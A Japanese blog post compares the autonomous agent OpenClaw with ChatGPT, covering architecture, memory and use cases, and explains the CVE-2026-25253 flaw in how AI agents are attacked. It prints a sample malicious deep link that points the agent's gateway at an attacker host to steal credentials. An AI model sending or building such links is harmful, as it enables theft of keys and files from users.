言語を切り替える
テーマを切り替える

OpenClawとChatGPTの本質的な違い:第一原理から理解する自律型AIエージェント

2026年1月、私のタイムラインはOpenClawで埋め尽くされました。3日でGitHubスター10万超え、「AI革命が来た」といった投稿が飛び交っていました。当時の私はタイトルを見てこう思いました。「ふーん、どうせローカルで動くChatGPTみたいなもんでしょ?ローカルだからデータも安全だし、プライバシーの心配もない、いいじゃん」と。

ところが2月初旬、あるセキュリティ警告を目にしました:CVE-2026-25253、CVSSスコア10点(満点)。これがどういうことか分かりますか?悪意のあるリンクを1つクリックしただけで、OpenClawが完全に制御されてしまうということです。攻撃者はルートディレクトリのファイルを読み取り、APIキーを盗み、ブラウザの履歴を覗くことができます。

私は呆然としました。こんなことはChatGPTでは絶対に起こり得ません。同じAIなのに、なぜOpenClawはシェルコマンドを実行し、ファイルを読み書きし、ブラウザを制御できるのに、ChatGPTは大人しくテキストを生成することしかできないのでしょうか?

その日の夜、数時間かけてOpenClawのGitHubリポジトリと技術ドキュメントを読み漁り、ようやく理解しました。元々多くの人(私を含め)が根本的に誤解していたのです。OpenClawは「ローカル版ChatGPT」などではなく、全く異なる生物——自律型AIエージェント(Autonomous AI Agent)だったのです。

この記事では、「自律性」とは一体何なのかについてお話ししたいと思います。第一原理から出発し、OpenClawとChatGPTの本質的な違いを分解します。もしあなたが、いつ対話型AIを使い、いつAIエージェントを使うべきか迷っているなら、この記事が役立つはずです。

第一原理:「自律性」とは何か?

定義に戻りましょう。ChatGPTは対話型AI(Conversational AI)、OpenClawは自律型AIエージェント(Autonomous AI Agent)です。似たような言葉に見えますが、実際には天と地ほどの差があります。

実際のシーンを使って説明しましょう。あなたのデスクトップにファイルが散乱していて、整理したいとします。

ChatGPTにこう言います:「デスクトップのファイルを整理して」

ChatGPTはこう返します:

「もちろんです!次のようにしてみてはどうでしょう:

  1. 『写真』『ドキュメント』『ダウンロード』などのフォルダを作成します
  2. 対応するファイルをそこに移動させます
  3. 不要な一時ファイルを削除します
    具体的なコマンドが必要ですか?」

注意してください、これは単なる提案です。あなたは自分でファイルマネージャーを開き、手動でフォルダを作り、手動でファイルをドラッグ&ドロップしなければなりません。

OpenClawに変えて、同じことを言います:

それは直接実行します:

ls ~/Desktop
mkdir ~/Desktop/photos ~/Desktop/docs ~/Desktop/downloads
mv ~/Desktop/*.jpg ~/Desktop/photos
mv ~/Desktop/*.pdf ~/Desktop/docs

あなたのデスクトップは、本当に整理されました。

違いが分かりましたか?ChatGPTは話す、OpenClawは行うのです。

この背後には3つの本質的な違いがあります:

1. 入出力の違い

  • ChatGPT:テキスト → テキスト(一問一答)
  • OpenClaw:意図 → 操作(要望を伝えると、一連のアクションを実行)

2. 実行環境の違い

  • ChatGPT:クラウドサンドボックス(OpenAIのサーバー上の隔離された仮想環境)
  • OpenClaw:あなたのローカルマシン(PC上で直接動作し、完全なシステム権限を持つ)

3. 権限モデルの違い

  • ChatGPT:システム権限ゼロ(あなたのファイルシステムすら見えません)
  • OpenClaw:完全な権限(ファイルシステム、シェル、ブラウザ制御、すべて触れます)

要するに、ChatGPTはアドバイザーでアイデアを出すだけですが、OpenClawはアシスタントで実際に作業を代行してくれます。これが「自律性」の核心——単に提案を提供するだけでなく、独立して操作を完了できるかです。

対話型AI vs 行動型AI——能力の境界線はどこか?

「自律性」を理解したところで、もう少し深く掘り下げましょう。これら2種類のAIの能力の境界線はどこにあるのでしょうか?

ChatGPTの能力の境界

ChatGPTが得意なことは明確です。自然言語理解、テキスト生成、文脈のある対話です。「豚の角煮の作り方」を聞けば詳細な手順を教えてくれますし、メールを書かせれば非常に適切な文章を作成してくれます。

しかし、根本的な制限があります。相互作用は毎回独立したAPIコールです。メッセージを送り、返事が来る、それだけです。次に話しかけた時、実は前の会話を覚えていません——有料のMemory機能を使うか、自分で会話履歴を毎回送らない限りは。

ChatGPTには現在、PluginsやGPTsがあり、外部APIを呼び出せるようになりました。例えば「今日の天気を調べて」と言えば、天気APIを叩いて結果を返します。しかし注意してください、これは依然として「リクエスト-レスポンス」モデルです。天気を能動的に監視したり、雨が降る前に自動で通知したりすることはできません。

OpenClawの能力の境界

OpenClawの能力はもっと野性的です。そのコア能力には以下が含まれます:

  • シェルコマンド実行:bash/zsh/PowerShellコマンドを直接実行
  • ファイルシステム読み書き:ファイルの読み取り、編集、作成、削除
  • ブラウザ制御:Chrome DevTools Protocol(CDP)を通じてブラウザを操作し、クリック、フォーム入力、スクリーンショット撮影が可能
  • クロスプラットフォームメッセージルーティング:WhatsApp、Telegram、Discord、Slack、Signal、iMessageなど14以上のメッセージングプラットフォームに対応

さらに重要なのは、自律性を持っていることです。例えば:

以前、私はOpenClawに「毎朝9時にGitHubに新しいissueがないかチェックして、あればTelegramで通知して」と頼みました。それは本当に実行されました——cronジョブを設定し、毎日自動でチェックし、新着issueがあればプッシュ通知してきました。

これはChatGPTでは絶対にできません。ChatGPTは能動的に行動できず、あなたのリクエストに受動的に反応することしかできないからです。

14+
対応メッセージングプラットフォーム数

まだ多くの人が知らない点があります。OpenClawには永続的な記憶があります。ローカルにMarkdownファイル(memory/YYYY-MM-DD.md)を作成し、毎日の対話と操作を記録します。次に「先週のあのPythonスクリプトどこだっけ?」と聞けば、記録をめくって場所を教えてくれます。この記憶はセッションをまたいで保持されるため、毎回背景情報を説明する必要はありません。

結局のところ、ChatGPTは博識な対話パートナーであり、OpenClawは手足となって動く知的アシスタントです。前者は考えるのを助け、後者は行うのを助けます。

OpenClawの3層アーキテクチャ——なぜ「行動」できるのか?

OpenClawは一体どうやってこれらの能力を実現しているのでしょうか?午後いっぱい時間をかけてアーキテクチャを研究したところ、3層構造の非常に巧みな設計であることが分かりました。

第1層:Gateway(コントロールプレーン)

これがOpenClawの「脳」です。Node.jsベースで、ローカルマシン上で動作し、デフォルトではループバック(127.0.0.1)にバインドされます。つまり、自分自身からしかアクセスできません。リモート操作したい場合は、TailscaleやSSHトンネルを通す必要があります。

Gatewayの中核はWebSocketネットワークアーキテクチャで、すべてのクライアント、ツール、イベントを管理します。Telegramからメッセージを送ると、Gatewayが受信し、どのツールを呼び出すか、どんな結果を返すかを決定します。

ここには「DMペアリングポリシー」(dmPolicy="pairing")というセキュリティ機構があります。見知らぬ送信者が初めてOpenClawにメッセージを送っても、直接実行はせず、ペアリングコードの入力を求めます。これは他人のなりすまし指令を防ぐためです。

第2層:Channel(メッセージルーティング)

この層はOpenClawの「神経系」です。WhatsApp、Telegram、Discord、Slack、Signal、iMessageなど14以上のプラットフォームをサポートしています。Telegramでコマンドを送ったり、Discordで質問したりできます。

OpenClawはセッション分離を行います:

  • mainセッション:あなたとOpenClawの直接対話
  • groupセッション:独立して隔離されたグループチャットモード

この設計の利点は、仕事のグループチャットで@OpenClawメンションして資料を調べさせても、個人的な対話のコンテキストに干渉しないことです。

第3層:LLM(推論エンジン)

これがOpenClawの「思考能力」です。特定の大規模言語モデルには依存せず、Claude Opus 4.5を使うことも、GPT-4を使うことも、Ollamaでローカルモデルを動かすこともできます。

重要な点はツール呼び出し(Tool Calling / Function Calling)です。「デスクトップのファイルを整理して」と言った時、LLMはその意図を理解し、bashツールを呼び出してmkdirmvコマンドを実行すると決定します。このプロセスは自動的で、手動で指定する必要はありません。

ChatGPTもFunction Callingをサポートしていますが、それは事前に定義されたAPIを呼び出すだけです。OpenClawは異なり、任意のシェルコマンド任意のファイル操作を呼び出せます。これこそが真の自律性です。

3層アーキテクチャが連携することで、OpenClawは「おしゃべりなAI」から「仕事ができるAI」へと変貌を遂げました。

永続的記憶メカニズム——なぜOpenClawはあなたを「覚えている」のか?

先ほどOpenClawの永続的記憶について触れましたが、この点が特に興味深いです。その設計哲学は「ファイルファースト」(File-First)と呼ばれ、少しレトロに聞こえますが、使い心地は最高です。

2層の記憶構造

OpenClawの記憶は2種類に分かれます:

  1. 短期記憶(Ephemeral Memory):毎日1つのMarkdownファイルで、パスはmemory/YYYY-MM-DD.mdです。今日OpenClawとした会話、実行した操作のすべてがこのファイルに記録されます。

  2. 永続記憶(Durable Memory):専用のMEMORY.mdファイルで、ナレッジベースのようなものです。重要な情報、よく使うコマンド、プロジェクト設定などを手動で書き込むことができ、OpenClawはこのファイルを優先的に参照します。

例えば:先週OpenClawにPythonスクレイパーを書いてもらい、~/scripts/scraper.pyに保存しました。今日「あのスクレイパーのスクリプトどこ?」と聞くと、memory/2026-02-01.mdを検索してパスを教えてくれます。

この設計の利点は完全に透明であることです。OpenClawが何を覚えているか知りたければ、Markdownファイルを開いて見るだけです。ChatGPTのMemory機能のように雲の中に隠れていて、何を覚えているか分からないのとは違います。

それに、これらの記憶ファイルはあなたのものです。手動で編集したり、バックアップしたり、Gitで管理したりできます。私は今や習慣として、毎週金曜日にMEMORY.mdをプライベートリポジトリにプッシュしています。万が一OpenClawがクラッシュしても、記憶は残ります。

ChatGPTの記憶との比較

ChatGPTにもMemory機能はありますが、有料サブスクリプション限定です。あなたの好みや習慣をクラウドに覚えさせ、次回の会話で参照させます。しかし、その記憶を直接見たり編集したりすることはできず、会話を通じて「あれは忘れて」と言うしかありません。

OpenClawは正反対です:記憶はローカルにあり、Markdown形式で、完全にコントロール可能です。ある会話を忘れさせたい?その数行を削除するだけです。新しい情報を覚えさせたい?MEMORY.mdに書き込むだけです。

正直、私はこの方式の方が好きです。AIの記憶は私の資産であり、どこかのプラットフォームのサーバーにロックされるべきではありません。

なぜOpenClawにCVE-2026-25253脆弱性があったのか?

冒頭の脆弱性の話に戻りましょう。CVSS 10点というスコアを見た時、私は震え上がりました——これは最高レベルの深刻度です。その後調査して、なぜこのような問題が起きたのか理解しました。

脆弱性の本質とは?

OpenClawには、URLパラメータでgatewayUrlを指定してWebSocket接続を自動確立する機能がありました。例えばリンクを踏むと:

openclaw://connect?gatewayUrl=ws://attacker.com:8080

OpenClawはこのアドレスに直接接続し、あなたの認証情報を送信してしまいます——この過程でユーザーの確認は一切ありません。

攻撃者は何を入手できるのか?

  • あなたのルートディレクトリのファイル(SSHキーや設定ファイルを含む可能性)
  • あなたのAPIキー(OpenAI、Claudeなど)
  • ブラウザの履歴とCookie
10点
CVSS深刻度スコア(満点)

基本的に、あなたのPC上でOpenClawがアクセスできるものは、すべて攻撃者も入手可能です。これがCVSS 10点——完全なリモートコード実行(RCE)と評価された理由です。

幸い、公式の対応は迅速で、2026年1月29日のバージョンで修正されました。現在は「この不明なGatewayに接続しますか?」という確認ポップアップが表示されます。

なぜChatGPTにはこの種の脆弱性がないのか?

この問いは重要です。ChatGPTでこのような脆弱性が起きることはまずありません。理由はシンプルで、ローカル実行権限がないからです。

ChatGPTはOpenAIのクラウドサーバー上で動作し、各ユーザーの対話は隔離されたサンドボックス内にあります。質問すればテキストを生成して返す、それだけです。ファイルシステムには触れず、ブラウザにも触れず、APIキーにも触れません。

OpenClawは違います。ローカルマシン上で動作し、完全なシステム権限を持っています。これは「仕事をする」ための前提条件ですが、同時にリスクの根源でもあります。

これが私の言うトレードオフです:自律性(Autonomy)= 高能力 + 高リスク

整理整頓、スクリプト実行、ブラウザ操作をしてくれるAIアシスタントが欲しいですか?ならば、それがシステム権限を持つという事実を受け入れなければなりません。権限が大きいほど責任も重く——脆弱性の影響も大きくなります。

これはOpenClawが安全でないと言っているわけではありません。すでにDMペアリングポリシーやループバックバインドなどの安全機構があります。しかし理解すべきは、システム権限を持つソフトウェアはどれも攻撃されるリスクがあるということです。OpenClawも、VSCodeプラグインも、ブラウザ拡張も同じです。

重要なのは、自分が何を使っているかを知り、リスクがどこにあるかを把握することです。

どのシーンでどれを使うべきか?選定ガイド

ここまで話してきましたが、最も実用的な問いはこれです:いつChatGPTを使い、いつOpenClawを使うべきか?

ChatGPTが適したシーン

あなたのニーズが以下なら、ChatGPTで十分です:

  1. 迅速な情報収集:資料検索、質問、概念の解説。ChatGPTの知識ベースは広く、回答品質も安定しています。

  2. コンテンツ生成:メール作成、コピーライティング、ドキュメント翻訳。これはChatGPTの強みで、速くて高品質です。

  3. ブレインストーミング:アイデア出し、プラン検討、アドバイス提供。実行者ではなく、対話パートナーが必要な場合です。

  4. 高いセキュリティ要件:社内イントラネットにいたり、機密データを扱う場合、ChatGPTのクラウドサンドボックス隔離は利点です。ローカルファイルに触れないため、漏洩もしません。

簡単に言えば:考える必要はあるが、行う必要はないことは、ChatGPTです。

OpenClawが適したシーン

以下のニーズがあるなら、OpenClawこそが真価を発揮します:

  1. 反復タスクの自動化:ファイルの一括処理、データの定期チェック、レポート生成。OpenClawはスクリプトを書き、cronを設定でき、毎回手動操作する必要がありません。

  2. クロスプラットフォーム連携:Telegramでコマンドを送りDiscordで通知させる、Slackからメッセージを取得してWhatsAppに同期するなど。こうしたプラットフォーム間の調整はOpenClawが得意です。

  3. 永続的なコンテキスト:長期プロジェクトで、AIにすべての詳細、過去の決定、コード構造を覚えていてほしい場合。OpenClawのローカル記憶はセッションを超えてコンテキストを維持します。

  4. ブラウザ自動化:自動テスト、ウェブスクレイピング、フォーム入力。OpenClawはCDPプロトコルを通じてブラウザを完全に制御できます。

  5. ローカルデータ優先:データをクラウドに上げたくない、あるいはローカルファイルやローカルツールを扱う必要がある場合。

簡単に言えば:行う必要があり、かつそれを繰り返すことは、OpenClawです。

私の個人的な使い方

私は現在、以下のように使い分けています:

  • 日常の相談:ChatGPT。技術的な質問、資料調査、ドキュメントのアウトライン作成。
  • コードレビュー:ChatGPT。コードを貼り付けて問題点を探させ、提案をもらう。
  • 自動化タスク:OpenClaw。毎朝のGitHub issueチェック、ダウンロードフォルダの整理、ノートの定期バックアップ。
  • プロジェクト協業:OpenClaw。プロジェクトのディレクトリ構造、よく使うコマンド、環境設定をすべて覚えてくれています。

2つのツールは競合関係ではなく、補完関係にあります。ChatGPTは「顧問」、OpenClawは「アシスタント」です。顧問は何をすべきか考えるのを助け、アシスタントは仕事を完遂するのを助けます。

結論

この記事を書いている間、私はずっと考えていました:AIの進化とは一体何なのか?

ChatGPTからOpenClawへ、それは単なる技術のイテレーションではなく、能力の境界線の拡張です。ChatGPTはAIに「話す」ことを教え、OpenClawはAIに「行う」ことを教えました。

しかしこの進化はタダではありません。自律性は能力をもたらすと同時に、リスクももたらしました。CVE-2026-25253は私たちに思い出させます。AIがシステム権限を持った時、それは強力なアシスタントになるのと同時に、攻撃者の入り口にもなり得るのだと。

結局のところ、OpenClawとChatGPTの違いを理解することは、対話と行動の違い、提案と実行の違い、クラウドとローカルの違いを理解することに他なりません。

もうOpenClawを「ローカル版ChatGPT」と呼ぶのはやめましょう。それは全く新しい生物——自律型AIエージェントです。その価値はおしゃべりできることではなく、行動できることにあります。

あなたに必要なのは、考えを整理してくれる顧問ですか?それとも仕事を片付けてくれるアシスタントですか?この問いを考えれば、どちらを選ぶべきか分かるはずです。

FAQ

OpenClawとChatGPTの最も核心的な違いは何ですか?
核心的な違いは自律性にあります:ChatGPTは対話型AI(テキスト→テキスト)であり、アドバイスや提案しかできません。OpenClawは自律型AIエージェント(意図→操作)であり、シェルコマンドの実行、ファイルの読み書き、ブラウザ制御を直接行えます。

簡単に言えば、ChatGPTは「話す」、OpenClawは「行う」です。前者は考えるのを助け、後者は作業を代行します。
なぜOpenClawはシステムコマンドを実行できてChatGPTはできないのですか?
実行環境と権限モデルが完全に異なるからです:

• ChatGPT:OpenAIのクラウドサーバー上の隔離されたサンドボックスで動作し、システム権限はゼロで、ユーザーのファイルシステムには触れません
• OpenClaw:ユーザーのローカルマシン上で動作し、完全なシステム権限を持ち、ファイルシステムへのアクセス、シェルコマンドの実行、ブラウザ制御が可能です

この設計の違いにより、ChatGPTはテキスト提案の生成に留まり、OpenClawは実際の操作を実行できます。
CVE-2026-25253脆弱性はなぜそれほど深刻なのですか?
CVSSスコア10点(満点)の理由は、完全なリモートコード実行のリスクがあるためです:

攻撃者は悪意のあるリンク(openclaw://connect?gatewayUrl=悪意あるアドレス)を送るだけでよく、OpenClawは自動的に接続して認証情報を送信してしまいます。攻撃者は以下が可能になります:
• ルートディレクトリファイルの読み取り(SSHキー、設定ファイルなど)
• APIキーの取得(OpenAI、Claudeなど)
• ブラウザ履歴とCookieへのアクセス

幸い、2026年1月29日のバージョンで修正されており、現在は接続時にユーザー確認が必要です。
OpenClawの永続的記憶はどのように機能しますか?
OpenClawは「ファイルファースト」設計を採用し、ローカルにMarkdown形式で記憶を保存します:

• 短期記憶:毎日1つのファイル(memory/YYYY-MM-DD.md)に、その日のすべての対話と操作を記録
• 永続記憶:MEMORY.mdファイルに、ナレッジベースのように重要な情報、よく使うコマンド、プロジェクト設定を保存

利点は完全に透明でコントロール可能な点です。これらのファイルを直接開いて編集したり、バックアップしたり、Gitで管理したりできます。クラウドにロックされてアクセスできないChatGPTのMemory機能とは対照的です。
どのようなシーンでChatGPTではなくOpenClawを選ぶべきですか?
「考える」だけでなく「行う」必要がある場合にOpenClawを選びます:

• 反復タスクの自動化:ファイルの一括処理、データの定期チェック、レポート生成
• クロスプラットフォーム連携:Telegramでコマンドを送りDiscordで通知させる
• 永続的なコンテキスト:長期プロジェクトでAIに詳細や過去の決定を覚えていてほしい場合
• ブラウザ自動化:自動テスト、スクレイピング、フォーム入力
• ローカルデータ優先:データをクラウドに上げたくない、ローカルファイルを扱いたい

一方でChatGPTは、迅速な相談、コンテンツ生成、ブレインストーミングなど、実際の実行を伴わないシーンに適しています。両者は補完関係です。
OpenClawはどのメッセージングプラットフォームに対応していますか?
OpenClawは14以上の主要プラットフォーム間のクロスプラットフォームメッセージルーティングをサポートしています:

• インスタントメッセンジャー:WhatsApp、Telegram、Discord、Slack、Signal
• 企業コラボレーション:Microsoft Teams、Mattermost
• ソーシャル:iMessage、Twitter/X
• その他:IRC、Matrixなど

どのプラットフォームからコマンドを送ってもOpenClawは統一的に処理し、セッション分離(mainセッションとgroupセッションの独立)によりコンテキストの干渉を防ぎます。
OpenClawを使用する際に注意すべきセキュリティリスクは?
OpenClawは完全なシステム権限を持つため、以下の点に注意が必要です:

• 権限リスク:ファイルシステムへのアクセスや任意コマンドの実行が可能なため、誤操作で重要ファイルを削除する可能性があります
• ネットワークリスク:デフォルトは127.0.0.1(ローカルのみ)ですが、リモート公開する場合は追加のセキュリティ対策が必要です
• 認証リスク:知らない人からの指令を防ぐDMペアリングポリシーを使用し、ペアリングコードを厳重に管理してください
• 脆弱性リスク:バージョンを適時更新し、セキュリティ情報をチェックしてください

覚えておいてください:自律性=高能力+高リスクです。システム権限を持つソフトウェアは攻撃の可能性があります。リスクを理解し、適切な対策を講じることが重要です。

7 min read · 公開日: 2026年2月4日 · 更新日: 2026年2月5日

コメント

GitHubアカウントでログインしてコメントできます

関連記事